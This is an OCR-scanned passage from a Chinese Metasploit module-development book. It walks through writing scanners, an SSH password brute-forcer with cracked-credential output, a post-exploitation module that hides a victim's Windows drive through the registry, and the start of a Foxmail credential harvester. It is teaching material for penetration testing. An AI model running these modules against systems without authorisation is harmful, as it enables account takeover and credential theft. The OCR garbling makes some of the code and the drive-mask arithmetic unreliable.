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这 个 方法 将 会 帮助 你 连接 到 目标 服务 器 ， 创 建 一 个 请 求 ， 发 送 这 个 请 求 ， 接 收 响应 ， 并 将 这 
个 响应 保存 到 变量 res 中 。 


目录 /rex/proto/http/ 中 的 client.rb 文 件 中 的 所 有 参数 都 经 过 检查 之 后 ,通过 这 个 方法 可 将 其 传递 
给 方法 request_raw。 有 很 多 可 以 在 参数 列表 中 设置 的 参数 ,来 看 看 它们 分 别 是 什么 。 


+ 
# Create an arbitrary HTTP request 
+ 
# @param opts [Hash] 
# @option opts 'agent' String] User-Agent header value 
# Goption opts 'connection' String] Connection header value 
# @option opts 'cookie' String] Cookie header value 
# @option opts 'data' String] HTTP data (only useful with some methods, see rfc2616 
# @option opts 'encode' Bool] URI encode the supplied URI, default: false 
# @option opts 'headers' Hash] HTTP headers, e.g. <code>{ "X-MyHeader" => "value" }</code> 
# Goption opts 'method' String] HTTP method to use in the request, not limited to standard methods 
# Goption opts 'proto' String] protocol, default: HTTP 
# @option opts 'query' String] raw query string 
# @option opts 'raw headers' Hash] HTTP headers 
# @option opts 'uri' String] the URI to request 
# @option opts 'version' String] version of the protocol, default: 1.1 
# @option opts 'vhost' String] Host header value 
+ 
# @return [ClientRequest] 
def request raw(opts-(]) 
opts = self.config.merge (opts) 
opts['ss1'] = self.ssl 
opts['cgi'] = false 
opts['port'] = self.port 


req = ClientRequest.new(opts) 
end 


res 是 一 个 用 来 存储 结果 的 变量 。 下 一 条 指令 是 指 如 果 请 求 不 成 功 , 则 返回 ; 如 果 请 求 成 功 ， 
执行 下 一 条 命令 。 下 一 条 命令 的 执行 将 会 运行 /ibmmsfcore/exploithttp/clientrm 文件 中 的 
http_fingerprint 方 法 ， 并 将 结果 保存 到 一 个 名 为 fp 的 变量 中 。 该 方法 将 记录 和 过 滤 信息 〈 如 
Set-cookie、Powered-by 等 )。 这 个 方法 需要 一 个 HTTP 响应 的 数据 包 进 行 运算 。 因 此 ,我 们 将 
会 把 收 到 的 响应 作为 一 个 参数 赋值 给 res ， 这 意味 着 将 根据 之 前 发 送 请 求 的 响应 数据 进行 特征 匹 
配 工 作 。 然 而 ， 如 果 这 个 参数 没有 指定 ， 这 些 步 又 将 会 重新 执行 以 获得 需要 的 数据 。 在 下 一 行 ， 
我 们 简单 地 输出 了 响应 。 最 后 一 行 的 rescue : :Timeout::Error，::Errno::EPIPE， 将 会 在 
模块 超时 的 情况 下 人 处理 程序 的 异常 。 


现在 ， 让 我 们 来 运行 这 个 模块 ， 看 看 会 输出 什么 。 


msf > use auxiliary/scanner/http/http version 

msf auxiliary(http version) » set RHOSTS 192.168.10.105 
RHOSTS => 192.168.10.105 

msf auxiliary(http version) > run 


[*] 192.168.10.105:80 Apache/2.4.10 (Debian) ( 302-login.php ) 
[*] Scanned 1 of 1 hosts (100$ complete) 
[*] Auxiliary module execution completed 
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现在 我 们 已 经 看 到 了 一 个 模块 是 如 何 工 作 的 。 让 我 们 在 此 基础 上 更 上 一 层 楼 , 开始 编写 自 定 
义 模块 。 


2.2.4 编写 一 个 自 定义 FTP 扫描 程序 模块 


下 面 来 尝试 开发 一 个 简单 的 模块 。 我 们 将 开发 一 个 简单 的 FTP 服 务 识 别 模块 ， 并 了 解 它 的 工 
作 原 理 。 接 下 来 查看 FTP 模 块 的 代码 : 


require 'msf/core' 

class Metasploit3 « Msf::Auxiliary 
include Msf::Exploit::Remote::Ftp 
include Msf::Auxiliary::Scanner 
include Msf::Auxiliary::Report 
def initialize 


super( 
'Name' => 'FTP Version Scanner Customized Module', 
'Description' -» 'Detect FTP Version from the Target', 
'Author' -» 'Nipun Jaswal', 
'License' -» MSF LICENSE 


) 
register options( 
[ 
Opt::RPORT (21), 
], self.class) 
end 


我 们 的 代码 从 定义 需要 的 库 开 始 。 在 最 开始 的 位 置 定义 了 语句 required 'msf/core', f& 
此 引入 了 core 库 。 接 着 定义 了 创建 的 模块 的 所 属 类 型 。 这 里 创建 的 是 一 个 辅助 类 型 的 模块 ， 该 模 
块 与 之 前 介绍 的 那个 模块 一 样 。 下 一 步 ， 定 义 我 们 需要 包含 在 core 库 之 中 的 库 文件 。 


引入 语句 路 径 用 途 
Msf:Exploit::Remote::Ftp  /lib/msf/core/exploit/ftp.rb 包含 了 所 有 FTP 操 作 相 关 的 方法 ， 比 如 
建立 FTP 连 接 、FTP 服 务 登录 、 发 送 FTP 
命令 等 


Msf::Auxiliary::Scanner /lib/msf/core/auxiliary/scanner.rb 包含 了 各 种 扫描 模块 要 使 用 的 函数 , 提 
供 了 很 多 方法 , 例如 模块 运行 、 初 始 化 
以 及 进度 扫描 等 
Msf::Auxiliary::Report /lib/msf/core/auxiliary/report.rb 包含 了 所 有 报告 函数 , 这 些 函 数 可 以 将 
正在 运行 的 模块 中 的 数据 存储 到 数据 
库 


fe POR, 使 用 initialize 方 法 定义 这 个 模块 的 属性 和 信息 , 例如 描述 、 作 者 姓名 、 许 可 等 。 
也 定义 了 该 模块 运行 所 需要 的 选项 。 例 如 ， 这 里 我 们 将 RPORT 的 值 设置 为 21， 这 是 FTP 的 默认 端 
口 。 接 着 我 们 查看 模块 后 面 的 部 分 。 


def run, host (target_host) 
connect (true, false) 
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if (banner) 
print_status("#{rhost} is running #{banner}") 


report service(:host => rhost, :port => rport, :name => "ftp", :info => 
banner) 
end 
disconnect 
end 
库 和 函数 
接 下 来 看 一 些 库 文 件 中 的 函数 ， 用 途 如 下 表 所 示 。 
ES S E x 件 用 R 
run host /lib/msf/core/auxiliary/scanner.rb 对 每 台 主 机 运行 一 次 的 主要 方法 
connect /lib/msf/core/exploit/ftp.rb 负责 与 主机 建立 一 个 连接 并 抓 取 banner， 然 后 
9 动 将 这 个 banner 保 存 到 变量 中 


report service /lib/msf/core/auxiliary/report.rb 专门 用 于 将 服务 和 相关 细节 添加 到 数据 库 中 


我 们 定义 了 run_host 方 法 ， 它 将 作为 程序 的 主 方法 ; 而 connect 函 数 用 来 初始 化 一 个 连接 
到 目标 的 进程 。 我 们 需要 问 connect 函 数 提供 两 个 参数 ,true 和 false。 参 数 true 定 义 了 全 局 
参数 的 使 用 ， 而 false 定 义 关 闭 模块 的 详细 功能 。 子 数 connect 的 优点 在 于 它 能 自动 连接 目标 ， 
以 及 自动 将 FTP 服 务 的 标识 保存 到 名 为 banner 的 参数 ， 如 下 面 的 屏幕 截图 所 示 。 


# 
# This method establishes an FTP connection to host and port specified by 
# the 'rhost' and 'rport' methods. After corhecting, the banner 
# message is read in and stored in the 'banner' attribute. 
# 
def connect (global = true, verbose = nil) 
verbose ||= datastore['FTPDEBUG'] 
verbose ||= datastore['VERBOSE'] 


print_status("Connecting to FTP server ; 2.7) if verbose 
fd = super(global) 


# Wait for a banner to arrive... 
self.banner - recv ftp resp(fd) 


print status("Connected to target FTP server.") if verbose 
# Return the file descriptor to the caller 


fd 
end 


这 个 结果 保存 到 了 banner 属 性 中 ,因此 只 需 在 最 后 打印 输出 这 个 panner 即 可 。 接 下 来 使 用 


函数 report_service, 将 扫描 数据 保存 在 数据 库 中 以 供 之 后 使 用 或 者 生成 高 级 报告 。 这 个 函数 
位 于 auxiliary 库 中 的 report.rb 文 件 中 ，report_service 靖 数 的 代码 如 下 图 所 示 。 
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# 
# Report detection of a service 
# 
def report_service(opts={}) 
return if not db 
opts = { 
:workspace => myworkspace, 
:task => mytask 
]. merge(opts) 
framework.db.report service(opts) 
end 


def report note(opts-(]) 
return if not db 
opts = { 
:workspace => myworkspace, 
:task => mytask 
}.merge(opts) 
framework.db.report note(opts) 
end 


向 report . service 方 法 提供 的 参数 都 通过 寸 男 一 个 方法 framework .db. report service 
保存 到 了 数据 库 ， 这 个 方法 位 于 /lib/msfrcore/db managerservice.rb。 当 完成 了 所 有 必需 的 操作 之 
后 ， 就 可 以 切断 和 目标 之 间 的 连接 了 。 


这 是 一 个 简单 的 模块 ， 建 议 你 现在 尝试 编写 一 些 简 单 的 扫描 程序 和 一 些 类 似 的 模块 。 


e 使 用 msftidy 


在 使 用 msftigy 运 行 这 个 模块 之 前 , 要 先 检查 一 下 这 些 刚刚 开发 的 模块 的 语法 是 否 正 确 。 为 
此 ， 可 以 使 用 Metasploit 中 名 为 msftidy 的 内 置 工具 ， 如 下 图 所 示 。 


rootümm: ~# /usr/share/metasploit-framework/tools/dev/msftidy.rb /usr/share/metas 

ploit-framework/modules/auxiliary/scanner/ftp/ftp version by nipun.rb 

/usr/share/metasploit-framework/modules/auxiliary/scanner/ftp/ftp version by nip 

un.rb:31 - [ ] Spaces at EOL 

rootümm: ~# 

我 们 得 到 了 一 条 警告 消息 , 在 末尾 的 第 19 行 存 在 一 些 多 余 的 空 空格 。 因 此 删除 掉 代 码 中 那些 无 
用 的 空格 , 然后 重新 回 到 ms ftidy。 此 时 不 再 有 错误 提示 了 ,这 意味 着 这 个 模块 在 语法 上 不 存在 
错误 了 。 


好 了 ， 现 在 来 运行 这 个 模块 并 查看 我 们 收集 到 的 信息 。 


msf auxiliary(ftp version by nipun) > run 


[*] 192.168.10.110 is running 220 (vsFTPd 2.3.4) 


[*] Scanned 1 of 1 hosts (1005 complete) 
[*] Auxiliary module execution completed 
msf auxiliary(ftp version by nipun) » services 


Services 


host port proto name state info 


192.168.10.110 21 tcp ftp open 220 (vsFTPd 2.3.4) 
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可 以 看 到 , 这 个 模块 的 运行 非常 顺利 。 它 获得 目标 服务 器 在 21 号 端口 上 运行 的 服务 的 banner， 
即 vsFTPd 2.3.4。 上 一 个 模块 中 的 函数 report_service 将 数据 保存 到 服务 字段 ， 我 们 可 以 使 用 


services 命 令 来 查看 这 个 字段 。 


€ 更 多 有 关 Metasploit 项 目 对 模块 的 支持 情况 ， 请 访问 https://github.com/rapid7/ ER 


metasploit-framework/wiki/Guidelines-for-Accepting-Modules-and-Enhancements ~ 


2.2.5 编写 一 个 自 定义 的 SSH 认证 暴力 破解 器 


为 了 查 出 网 络 中 存在 的 那些 弱 口 令 , 需要 编写 一 个 认证 暴力 破解 器 。 这 些 测试 不 仅仅 能 测试 
应 用 程序 中 的 弱 口 令 , 还 可 以 确保 准确 的 授权 和 对 访问 的 控制 。 这 些 测试 使 攻击 者 在 尝试 了 一 些 
随机 猜测 的 暴力 攻击 之 后 会 被 系统 拒绝 访问 ， 从 而 确保 攻击 者 不 能 简单 地 绕 过 安全 模式 。 


接着 来 编写 一 个 用 于 检测 SSH 服 务 认证 是 否 安全 的 模块 ,将 会 看 到 使 用 Metasploit 来 设计 一 个 
这 样 的 模块 是 多 么 简单 。 先 来 查看 模块 代码 的 一 部 分 : 


require 'msf/core' 
require 'metasploit/framework/credential, collection' 
require 'metasploit/framework/login scanner/ssh' 


class Metasploit3 « Msf::Auxiliary 


include Msf::Auxiliary::Scanner 
include Msf::Auxiliary::Report 
include Msf::Auxiliary::AuthBrute 
def initialize 
super( 
'Name' -» 'SSH Scanner', 
'Description' => %q{ 


My Module. 
) 
'Author' -» 'Nipun Jaswal', 
'License' -» MSF LICENSE 


) 


register options( 
[ 
Opt : : RPORT (22) 
], self.class) 
End 


在 前 面 的 示例 中 ， 我 们 已 经 看 到 了 引信 Msf::Auxiliary::Scanner 和 Msf::Auxiliary:: 
Report 的 重要 性 。 下 面 给 出 了 男 一 个 引入 的 库 文件 ， 下 表 是 它 的 用 途 。 
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引入 语句 路 B A B 
Msf::Auxiliary::AuthBrute /lib/msf/core/auxiliary/auth brute.rb 提供 了 必要 的 暴力 破解 机 制 和 功 
能 ， 例 如 提供 了 单独 的 登录 用 户 
名 和 密码 表 、 生 词 表 、 空 密码 等 
选项 


前 面 的 代码 引入 了 三 个 库 文件 ,分别 是 msf/core 、metasploit/framework/login_scanner/ssh 和 
metasploit/framework/credential collection 。 msf/core 库 文件 包含 了 core 库 的 路 径 。metasploit/ 
framework/login_scanner/ssh 包 含 了 SSH 登 录 扫 描 库 ， 利 用 这 个 库 可 以 避免 所 有 的 手动 操作 ， 它 还 
提供 了 SSH 扫 描 的 基础 API。metasploit/framework/credential collection 帮 助 我 们 通过 使 用 aatastore 
中 的 用 户 输入 ， 创 建 复合 的 登录 凭证 。 


接 下 来 ,我 们 定义 了 类 的 版 本 以 及 模块 的 类 型 ， 这 和 我 们 之 前 做 的 一 样 。 在 initialize 部 
分 为 这 个 模块 定义 了 基本 信息 。 来 看 下 面 的 代码 : 


def run host (ip) 

cred collection = Metasploit::Framework::CredentialCollection.new( 
blank passwords: datastore['BLANK PASSWORDS'], 
pass file: datastore['PASS FILE'], 
password: datastore['PASSWORD'], 
user file: datastore['USER FILE'], 
userpass file: datastore['USERPASS FILE'], 
username: datastore['USERNAME'], 
user as pass: datastore['USER AS PASS'], 

) 


scanner - Metasploit::Framework::LoginScanner::SSH.new( 
host: ip, 
port: datastore['RPORT'], 
cred details: cred collection, 
proxies: datastore['Proxies'], 
Stop on success: datastore['STOP ON SUCCESS'], 
bruteforce speed: datastore['BRUTEFORCE SPEED'], 
connection timeout: datastore['SSH TIMEOUT'], 
framework: framework, 
framework module: self, 


) 


上 面 的 代码 中 有 两 个 主要 的 对 象 ， 分 别 是 cred_collection 和 scanner。 有 一 点 必须 要 注 
意 ， 在 登录 到 SSH 服 务 时 并 不 需要 进行 任何 手动 操作 ， 登 录 扫 描 咒 会 完成 所 有 的 工作 。 因 此 ， 
cred_collection 仅 仅 实 现 了 按照 数据 存储 选项 来 设置 登录 凭证 .credqentialcollection 类 
的 优势 在 于 ， 它 既 可 以 在 一 次 扫描 中 同时 执行 单一 的 用 户 名 /密码 组 合 、 生 词 本 、 空 白 密码 等 操 
作 ， 也 可 以 一 次 只 执行 一 种 操作 。 


所 有 的 登录 扫描 模块 都 需要 使 用 credential 对 象 完成 登录 操作 。 上 面 代 码 中 定义 的 .scanner 
对 象 完 成 了 对 一 个 SSH 类 对 象 的 初始 化 。 这 个 对 象 中 存储 了 目标 的 地 址 、 端 口 、 使 用 
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CredentialCollection 类 产生 的 登录 作证 和 其 他 信息 , 包括 代理 信息 、stop_on_success 的 
E (如果 为 真 ， 扫 描 将 会 在 获取 到 正确 的 登录 凭证 之 后 停止 )、 暴 力 破 解 的 速度 以 及 登录 超时 
的 值 。 


到 此 为 止 ,我们 已 经 创建 了 cred_collection 和 scanner 两 个 对 象 ,其 中 的 creqd_collection 
对 象 会 基于 用 户 的 输入 产生 登录 凭证 ，scanner 对 象 会 使 用 这 些 登 录 赁 证 去 扫描 目标 。 接 下 来 需 
要 定义 一 个 机 制 ， 这 个 机 制 用 来 确定 在 对 目标 测试 时 是 使 用 单词 表 中 的 所 有 登录 凭证 ,还 是 将 这 
些 登录 凭证 作为 参数 进行 扩展 。 


在 之 前 的 示例 中 ， 我 们 已 经 见 过 了 run_host 的 用 法 。 接 下 来 看 看 在 代码 中 可 以 使 用 的 各 种 
库 文件 的 其 他 函数 。 


EC 数 E ox dt 用 R 
create credential() /lib/msf/core/auxiliary/report.rb 从 result 对 象 中 得 到 登录 凭证 数据 
create credential login() /lib/msf/core/auxiliary/report.rb 从 zesult 对 象 中 创建 登录 凭证 ， 利 用 
这 个 凭证 可 以 登录 特定 的 服务 
invalidate login /lib/msf/core/auxiliary/report.rb 用 来 标记 一 些 对 目标 服务 无 效 的 登录 
凭证 
下 面 给 出 了 实现 过 程 : 


Scanner.scan! do |result| 
credential data - result.to h 
credential data.merge!( 
module fullname: self.fullname, 
workspace id: myworkspace id 
) 
if result.success? 
credential core = create credential(credential data) 
credential data[:core] - credential core 
create credential login(credential data) 


print good "#{ip} - LOGIN SUCCESSFUL: $(result.credential)" 
else 
invalidate login(credential data) 
print status "#{ip} - LOGIN FAILED: &(result.credential) 
(ffresult.status): #{result.proof})" 
end 
end 
end 
end 


使 用 .scan 可 以 实现 扫描 的 初始 化 , 它 将 完成 所 有 的 登录 尝试 一 一 这 表示 我 们 无 须 指定 其 他 
机 制 。.scan 指 令 就 相当 于 Ruby 中 的 each 循 环 语句 。 


下 一 条 语句 将 结果 保存 到 了 result 对 象 中 ， 并 使 用 to_ph 方 法 对 这 个 结果 进行 处 理 后 分 配给 
变量 credential_gdata。to_h 方 法 的 作用 是 将 数据 转换 成 哈 希 格式 。 下 一 行将 模块 的 名 字 和 工 
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作 区 id 合并 到 creqaential_dqata 变 量 中 。 再 下 一 行 在 if-else 语 句 中 使 用 result 对 象 
的 .success 变 量 作为 判断 条 件 , 这 个 变量 表示 对 目标 的 登录 是 否 成 功 。 如 果 result .success? 
的 值 为 ctrue， 就 认为 这 个 登录 凭证 是 正确 的 ， 并 将 其 保存 到 数据 库 中 ; 不 过 如 果 这 个 条 件 不 满 
足 要 求 ， 就 将 这 个 登录 数据 变量 传递 给 invalidqate_login 方 法 ， 表 示 这 次 登录 失败 了 。 


我 建议 在 使 用 本 章 以 及 其 后 所 有 模块 前 , 先 使 用 ms ftidy 对 它们 进行 一 致 性 检查 。 下 面 尝 试 
运行 这 些 模块 。 


msf > use auxiliary/scanner/ssh/ssh brute 

msf auxiliary(ssh brute) > set RHOSTS 192.168.10.110 
RHOSTS -» 192.168.10.110 

msf auxiliary(ssh brute) » set USER FILE /root/user 
USER FILE => /root/user 

msf auxiliary(ssh brute) » set PASS FILE /root/pass 
PASS FILE => /root/pass 

msf auxiliary(ssh brute) » run 


[*] 192.168.10.110 
[*] 192.168.10.110 
[*] 192.168.10.110 
[*] 192.168.10.110 


LOGIN FAILED: admin:18101988 (Incorrect: ) 
LOGIN FAILED: admin:26021963 (Incorrect: ) 
LOGIN FAILED: admin:sjjhds2565 (Incorrect: ) 
LOGIN FAILED: admin:asass25555 (Incorrect: ) 


[*] 192.168.10.110 
[*] 192.168.10.110 
[*] 192.168.10.110 


LOGIN FAILED: cat:18101988 (Incorrect: ) 
LOGIN FAILED: cat:26021963 (Incorrect: ) 


192.168.10.110 - LOGIN SUCCESSFUL: root:18101988 
- LOGIN FAILED: cat:sjjhds2565 (Incorrect: ) 


通过 使 用 用 户 名 root 和 密码 18101988 , 我 们 已 经 成 功 登 录 到 了 目标 服务 。 接 下 来 使 用 creqs 
命令 来 查看 保存 到 数据 库 中 的 登录 凭证 。 


msf auxiliary(ssh brute) > creds 
Credentials 


host origin service public private realm private t 
ype 
192.168.10.110 192.168.10.110 22/tcp (ssh) root 18101988 Password 


msf auxiliary(ssh brute) > M 


现在 可 以 看 到 , 所 有 的 登录 细节 都 已 经 保存 到 了 数据 库 中 。 利 用 这 些 信息 ， 可 以 实现 进一步 
的 攻击 或 者 生成 渗透 报告 。 


换个 角度 来 看 这 个 过 程 
如 果 你 对 前 面 的 模块 感到 十 分 困惑 ， 现 在 就 来 一 步 步 地 了 解 它 。 
(]) 我 们 已 经 创建 好 了 一 个 credentialcollection 对 象 , 它 将 处 理 所 有 类 型 的 用 户 输 入 和 


H SEHE o 


这 表明 我 们 提供 的 用 户 名 和 密码 将 会 被 该 对 象 认 为 是 用 户 凭证 。 不 过 如 果 使 用 
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USER_FILE 和 PASS_FILE 作 为 字典 ， 这 个 对 象 就 会 将 字典 中 的 每 一 个 用 户 名 和 每 一 个 密码 进行 


一 次 组 合 ， 并 将 这 个 组 合作 为 一 个 用 户 凭证 。 


(2) 为 SSH 服 务 创建 了 一 个 scanner 对 象 ， 这 个 对 象 将 会 删除 所 有 的 手动 输入 命令 ， 然 后 依 


次 测试 我 们 提供 的 所 有 用 户 名 /密码 组 合 。 
(3) 使 用 .scan 方 法 运行 scanner， 这 样 就 可 以 开始 对 目标 的 用 户 凭 订 
(4) .scan 方 法 将 会 依次 使 用 所 有 用 户 凭 证 尝试 登录 。 然 后 根据 


FE 进行 暴力 破解 。 
尝试 结果 ， 或 者 使 用 


print_good 函 数 打 印 输出 并 将 其 保存 到 数据 库 中 ,或 者 使 用 print_status 打 印 函 数 但 不 保存 


到 数据 库 。 


2.2.6 ”编写 一 个 让 硬盘 失效 的 后 渗透 模块 


我 们 已 经 了 解 了 创建 模块 的 基础 ， 现 在 可 以 更 进一步 ， 来 创建 一 个 后 渗透 模块 了 。 要 牢记 ， 


只 有 在 成 功 地 渗透 一 个 目标 以 后 ， 才 可 以 运行 后 渗透 模块 。 


现在 就 从 一 个 让 硬盘 失效 的 简单 程序 开始 
硬盘 的 程序 。 该 程序 代码 如 下 : 


require 'msf/core' 
require 'rex' 
require 'msf/core/post/windows/registry' 
class Metasploit3 « Msf::Post 
include Msf::Post::Windows::Registry 
def initialize 


super( 
'Name' -» 'Drive Disabler', 
'Description' => 'This Modules Hides and Restrict Acc 
Drive', 
'License' -» MSF LICENSE, 
'Author' -» 'Nipun Jaswal' 


) 
register options( 


[ 


一 个 可 以 禁用 Windows 10 操 作 系 统 上 的 指定 


ess to a 


OptString.new('DriveName', [ true, 'Please SET the Drive Letter' ]) 


], self.class) 
end 


这 次 的 开始 方式 与 以 前 的 模块 一 样 。 我 们 将 这 个 后 渗透 模块 所 需要 的 基础 库 文 件 引入 到 了 代 


码 中 。 通 过 下 表 查 看 新 引入 的 库 以 及 用 途 。 


引入 语句 路 径 


Hx 


Msf::Post::Windows::Registry  lib/msf/core/post/windows/registry.rb Ruby 的 模块 混入 技术 使 我 们 
具有 操纵 注册 表 的 能 
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接 下 来 定义 模块 的 类 型 和 Metasploit 的 预期 版 本 。 在 这 个 示例 中 ， 我 们 将 模块 的 类 型 定义 为 
Post 来 表明 这 是 一 个 后 渗透 类 型 的 模块 ， 而 Metasploit3 为 预期 版 本 。 我 们 在 initialize 方 
法 中 将 模块 的 必要 信息 与 代码 定义 在 一 起 ,使 用 register_options 定 义 模块 中 要 使 用 的 自 定义 
选项 ， 并 且 使 用 optstring.new 将 DriveName 定 义 为 字符 串 类 型 。 要 定义 一 个 新 选项 ， 需 要 
required 和 description 两 个 参数 。 这 里 需要 将 required 的 值 设置 为 Lrue， 因为 我 们 需要 一 
个 盘 符 来 启动 隐藏 和 禁用 的 进程 。 将 这 个 值 设置 为 true 之 后 ， 除 非 将 一 个 值 分 配给 这 个 模块 ， 
否则 这 个 模块 将 不 会 启动 。 接 下 来 ,我 们 定义 了 新 添加 的 DriveName 选 项 的 描述 。 


在 讲解 后 面 的 代码 之 前 ， 先 来 看 看 这 个 模块 中 将 要 使 用 到 的 重要 函数 


BO o5 E x ft 用 BR 
meterpreter registry key exist lib/msf/core/post/windows/registry.rb 检查 在 注册 表 中 是 否 存 
在 一 个 指定 的 键 
registry createkey lib/msf/core/post/windows/registry.rb 创建 一 个 新 的 注册 表 键 
meterpreter registry. setvaldata lib/msf/core/post/windows/registry.rb 创建 一 个 新 的 注册 表 值 


接着 来 查看 这 个 模块 的 剩余 部 分 : 


def run 

drive int - drive string(datastore['DriveName']) 
keyl1-"HKLMNNSoftwareNMMicrosoftNNWWindowsNNCurrentVersionNNPoliciesNNExplore 
p" 


exists = meterpreter registry key exist?(keyl) 

if not exists 

print error("Key Doesn't Exist, Creating Key!") 

registry createkey (keyl) 

print good("Hiding Drive") 

meterpreter registry setvaldata(key1,'NoDrives',drive int.to s,'REG DWORD', 
REGISTRY VIEW NATIVE) 

print good("Restricting Access to the Drive") 

meterpreter registry setvaldata(keyl1,'NoViewOnDrives',drive int.to s,'REG D 
WORD',REGISTRY VIEW NATIVE) 

else 

print good("Key Exist, Skipping and Creating Values") 

print good("Hiding Drive") 

meterpreter registry setvaldata(key1,'NoDrives',drive int.to s,'REG DWORD', 
REGISTRY VIEW NATIVE) 

print good("Restricting Access to the Drive") 

meterpreter registry setvaldata(key1,'NoViewOnDrives',drive int.to s,'REG D 
WORD',REGISTRY, VIEW NATIVE) 

end 

print good("Disabled $s(datastore['DriveName']) Drive") 

end 


一 般 可 以 使 用 run 方 法 来 运行 一 个 后 渗透 模块 。 所 以 我 们 来 定义 run 方 法 , 在 这 个 run 方 法 中 
将 变量 DriveName 发 送 给 drive_string 方 法 以 获得 盘 符 对 应 的 数值 。 
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创建 一 个 名 为 keyl 的 变量 ， 然 后 将 注册 表 的 位 置 保存 在 这 个 变量 中 。 这 里 要 使 用 


meterpreter registry key_exist 方 法 来 检查 在 系统 中 是 否 已 经 存在 该 注册 表 键 。 


如 果 这 个 键 已 经 存在 ， 变 量 exists 就 会 被 赋值 为 tr*ue， 和 否则 就 会 被 赋值 为 false。 如 果 


exists 的 值 为 false， 则 使 用 registry_createkey (key1) 来 创建 一 个 注册 表 的 键 ， 然后 再 创 


建 注册 表 的 值 ， 如 果 这 个 值 为 Lrue， 则 只 需要 创建 它 的 值 即 可 。 


为 了 实现 对 盘 符 的 隐藏 和 访问 限制 ， 需 要 创建 两 个 注册 表 值 ， 它 们 分 别 为 Noprives 和 


NoVvViewonDrive， 值 为 10 进 制 或 者 16 进 制 表示 的 盘 符 ， 定 义 的 类 型 为 DWORD 。 


为 我 们 使 用 的 是 Meterpreter 命 令 行 ， 所 以 可 以 使 用 meterpreter_ registry_setvaldata 


方法 实现 这 两 个 注册 表 值 的 设 定 ,我 们 需要 向 函数 meterpreter_registry_setvaldata 提 供 5 
个 参数 以 保证 它 能 够 正常 运行 ,这 些 参数 包括 : 1 个 字符 串 类 型 的 注册 表 键 路 径 、1 个 字符 串 类 型 


的 注 
ip 
64 位 


由 


册 表 值 、1 个 10 进 制 数字 表示 的 硬盘 盘 符 〈 这 个 值 也 要 转换 成 对 应 的 字符 串 类 型 )，! 个 字符 
型 的 注册 表 值 类 型 和 1 个 整数 类 型 的 视图 值 (初始 为 0, 设置 为 1 表示 32 位 视图 , 设置 为 2 表示 
视图 )。 


下 面 列举 了 一 个 使 用 meterpreter_registry_setvaldata 的 示例 : 


meterpreter registry setvaldata(key1,'NoViewOnDrives',drive int.to s,'REG D 
WORD',REGISTRY VIEW NATIVE) 


在 这 段 代码 中 ,我 们 将 位 置 设置 为 key1, 值 设置 为 NoViewonDrives，10 进 制 的 4 表示 DD 盘 ， 


EG_DWORD 作 为 注册 表 的 类 型 ，REGISTRY_VIEW_NATIVE 表 示 值 为 0。 


D 要 访问 32 位 的 注册 表 ， 需 要 将 视图 参数 设置 为 1; 要 访问 64 位 的 注册 表 ， 则 


需要 设置 为 2。 这 两 个 值 可 以 使 用 REGISTRY_VIEW_32_BIT 和 REGISTRY_ 
VIEW_64_BIT 来 代替 。 


你 可 能 会 很 奇怪 为 什么 我 们 使 用 4 作为 盘 符 D 的 掩 码 ”下 面 来 看 看 这 个 掩 码 的 计算 过 程 。 


对 于 一 个 给 出 的 盘 符 掩 码 的 计算 , 可 以 使 用 公式 2^([ 驱 动 器 字符 序列 号 ]-D)。 比 如 我 们 需要 禁 
用 硬盘 C， 而 C 是 字母 表 中 的 第 3 个 字符 ， 因 此 计算 禁用 C 盘 的 准确 掩 码 的 过 程 就 应 如 下 所 示 : 


2^ (3-1) =2^2=4 


禁用 C 盘 的 掩 码 值 为 4。 在 上 面 的 代码 中 ,我 们 在 arive_string 方 法 中 使 用 case 分 支 语 名 


对 一 些 值 实现 了 硬 编码 。 下 面 给 出 实现 过 程 : 


def drive string(drive) 
case drive 


when "A" 


return 1 
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when "B" 
return 2 


when "C" 
return 4 


when "Dp" 
return 8 


when "E" 
return 16 
end 

end 

end 


从 上 面 的 代码 可 以 看 出 ， 以 盘 符 作为 参数 ， 这 个 函数 就 可 以 返回 对 应 的 掩 码 数值 ， 比 如 说 D 
盘 的 返回 值 就 是 gs。 下 面 运行 这 个 模块 来 查看 我 们 得 到 的 输出 。 


Ins£ post(disable drives) » show options 


Module options (post/windows/manage/disable drives): 


Name Current Setting Required Description 
DriveName D yes Please SET the Drive Letter 
SESSION 2 yes The session to run this module on. 


msf post(disable drives) > set DriveName D 
DriveName => D 
msf post (disable drives) > run 


Key Exist, Skipping and Creating Values 
Hiding Drive 
Restricting Access to the Drive 
Disabled D Drive 

[*] Post module execution completed 

msf post(disable drives) > 目 


WT, URTER ETRIE Y SESIRD: o 


v Folders (6) 
[P Desktop E Documents 4 Downloads 
IE! Videos 
v Devices and drives (2) 
Local Disk (C:) MI (E) 
KE E Let 
Wm 128 GB free of 243 GB Wm" 363 GB free of 394 GB 
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AMET! D: 驱 动 需 已 经 不 见 了 。 我 们 成 功 地 让 驱动 器 D: 在 用 户 的 眼前 消失 了 。 


现在 想 要 几 个 后 渗透 模块 ， 就 可 以 创建 几 个 了 。 我 建议 你 在 Metasploit 库 的 研究 上 多 花 一 些 
时 间 。 


首先 要 确保 你 已 经 获得 了 系统 级 的 访问 权限 来 执行 上 面 的 代码 。 这 是 因为 系统 级 的 访问 权限 
将 会 在 目标 系统 上 创建 注册 表 项 ， 而 不 是 仅仅 在 当前 用 户 上 创建 注册 表 项 。 另 外 , 我 们 使 用 HKLM 
而 不 是 HKEY_LOCAL_MACHINE 是 因为 系统 内 置 的 标准 化 模块 会 自动 创建 完整 形式 的 键 。 建 议 你 
仔细 阅读 registry.rb 文 件 ， 查 看 其 中 可 用 的 各 种 方法 。 


用 exploit/windows/local/bypassuac 模块 ， 然 后 执行 提升 权限 命令 


Q 如 果 你 想 在 目标 操作 系统 为 Windows 7 时 获得 系统 级 管理 权限 ， 可 以 尝试 使 
(getsystem)， 之 后 再 执行 前 面 的 模块 。 


2.2.7 ”编写 一 个 收集 登录 凭证 的 后 渗透 模块 


在 这 个 示例 模块 中 ,我 们 攻击 的 目标 是 Foxmail 6.5。 我 们 将 尝试 对 登录 凭证 进行 解密 ， 然 后 
将 它 保存 到 数据 库 中 。 下 面 给 出 了 具体 实现 的 代码 : 


require 'msf/core' 


class Metasploit3 « Msf::Post 
include Msf::Post::Windows::Registry 
include Msf::Post::File 
include Msf::Auxiliary::Report 
include Msf::Post::Windows::UserProfiles 


def initialize(info-()) 
super (update info(info, 
'Name' => 'FoxMail 6.5 Credential Harvester', 
'Description' => Wut 
This Module Finds and Decrypts Stored Foxmail 6.5 Credentials 
} 


'License' -» MSF LICENSE, 
